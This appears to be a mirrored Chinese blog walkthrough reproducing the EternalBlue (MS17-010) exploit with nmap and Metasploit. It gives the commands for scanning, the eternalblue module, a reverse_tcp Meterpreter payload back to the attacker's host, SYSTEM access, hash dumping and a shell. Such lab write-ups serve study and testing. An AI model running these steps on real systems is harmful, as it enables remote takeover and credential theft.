zoukankan      html  css  js  c++  java
  • ms17-010 永恒之蓝漏洞复现(CVE-2017-0143)

    0x01

    首先对目标机的开放端口进行探测,我们可以使用探测神器nmap

    发现开放的445端口,然后进行下一步的ms17-010的漏洞验证

    0x02

    打开MSF美少妇神器,用search命令搜索ms17-010

    用use命令选择要使用的扫描模块

    use auxiliary/scanner/smb/smb_ms17_010

    该模块之前需要设置相关选项,我们使用查看配置信息

    show options

    需要设置目标地址,设置命令:

    set rhosts 目标地址

    然后执行run或exploit命令

    可以看出目标机存在该漏洞

    0x03

    下面利用该漏洞完成攻击操作

    使用漏洞利用模块

    use exploit/windows/smb/ms17_010_eternalblue

    show options

    设置标记为yes的属性

    set rhosts 目标机地址

    反弹shell  set payload  windows/x64/meterpreter/reverse_tcp

    show options查看配置信息

    设置配置中缺少的本地主机

    set lhost 本地机地址

    本地端口lhost默认为4444(可以通过set lhost 端口号修改)

    运行exploit或者run,开执行漏洞利用模块,获取来自目标机的会话

    0x04

    getuid查看一下权限是system

    PS:利用该漏洞获得的权限都是system

    获取当前系统中的用户散列值

    输入shell获取系统命令行的shell

     

     

  • 相关阅读:
    git 账号密码
    sql server 备份
    计算经纬度的两点之间的距离
    redis 安装
    webapi 可空参数
    Asp.Net MVC4 使用Unity 实现依赖注入
    sublime主题推荐
    分解质数因子
    如何在sublime+chrome中调试php代码?
    php的mysql语句里变量加不加单引号问题
  • 原文地址:https://www.cnblogs.com/marcus666/p/13281016.html
Copyright © 2011-2022 走看看